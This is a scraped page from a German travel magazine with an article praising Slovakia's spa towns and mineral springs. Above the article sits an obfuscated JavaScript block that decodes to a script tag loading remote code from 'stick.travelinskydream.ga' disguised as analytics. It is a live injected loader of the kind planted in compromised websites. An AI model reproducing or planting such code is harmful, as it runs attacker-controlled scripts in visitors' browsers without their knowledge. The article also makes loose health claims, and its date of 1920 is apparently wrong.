var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller(); Die Slowakei ist immer noch ein absoluter Geheimtipp | Bonnes Vacances - Das Magazin für VIP Reisen

Die Slowakei ist immer noch ein absoluter Geheimtipp

Die Slowakei ist immer noch ein absoluter

Geheimtipp

 

Foto: pixabay

Wenn es um den Gesundheitstourismus geht könnte ganz Europa mit dem wohltuenden Wasser aus den Mineralquellen in der Slowakei versorgt werden. Die Slowakei hat einen immensen unterirdischen Reichtum, der in den zahlreichen Heilbädern genossen werden kann. Das Heilwasser hilft zusammen mit den vielen verschiedenen Anwendungen Krankheiten zu heilen und bringt neue Energie für erschöpfte und gestresste Menschen.

Der unterirdische  Reichtum

Die Slowakei verfügt mit den fast unerschöpflichen Quellen an Mineralwasser über eine große Anziehungskraft für den Gesundheitstourismus und somit für Menschen, die nach Ruhe, aktiver Erholung und einer gesunden Lebensweise suchen. Das Wasser steigt aus zahlreichen Mineralquellen an die Oberfläche mit ihren heilenden Kräften und Wirkung auf den menschlichen Organismus. Dank ihrer Fähigkeit auch Krankheiten zu heilen und sogar die Gesundheit zurückzugewinnen.

Die Heilbäder gehören zu den ältesten und hochwertigsten in Mitteleuropa. Der wohl bekannteste Kurort ist Piešťany (Pistyan), der sowohl durch das thermale Mineralwasser als auch durch das heilende Schwefelmoor berühmt geworden ist Der Kurort Rajecké Teplice (Bad Rajetz) begeistert seine Besucher durch die exklusive antike Atmosphäre und Turčianske Teplice (Bad Stuben) wiederum durch die einzigartige Prozedur, die sogenannte Goldkur von Turčianske Teplice. Als europäisches Unikat können zwei Kurorte bezeichnet werden. In Sklené Teplice befindet sich das Höhlendampfbad mit dem Namen Parenica und in Trenčianske Teplice (Trentschin-Teplitz) das einzigartige türkische Hammam Bad.

Ideal ist für den Heilungs- und Erholungsprozess auch die außergewöhnlich saubere Luft im Gebirge der Hohen Tatra, wo sich einige der Klimaheilbäder befinden.

Slowakische Kurorte mit Indikationen

Die Slowakei ist weltweit durch ihre namhaften Kurorte bekannt, die sich auf die Behandlung verschiedener Indikationen spezialisiert haben. Die Thermalquellen und der Heilschlamm sowie das wunderbare Klima bewirken Entspannung und Linderung der Beschwerden durch ihre außergewöhnliche Heilkraft. Die reichen natürlichen Quellen und das medizinische Fachpersonal unterstützen gemeinsam bei der Behandlung, Genesung, Prophylaxe oder bei der Rehabilitation nach Unfällen, Krankheiten sowie bei Ihrer Entspannung und beim weiteren Kräfteschöpfen

Unter dem nachfolgenden Link finden sich die bekanntesten 30 Kurorte auf einer Karte eingezeichnet und mit Adressen sowie Mailkontakt. Für jeden Kurort werden die behandelbaren Beschwerden aufgeführt, für die sich der Ort am besten eignet.

Der Kurort Sliač lockt wegen seiner hervorragenden Heilwasserqualität berühmte Leute aus der ganzen Welt an.

Hier erfahren Sie weitere Daten

Wer noch mehr über die Möglichkeiten im Gesundheitstourismus der Slowakei erfahren möchte, wendet sich bitte an Karolina Ducká vom Slowakischen Fremdenverkehrsamt: karolina.ducka@mindop.sk.

Bericht: S. Lüddecke
28.11.1920

%d Bloggern gefällt das: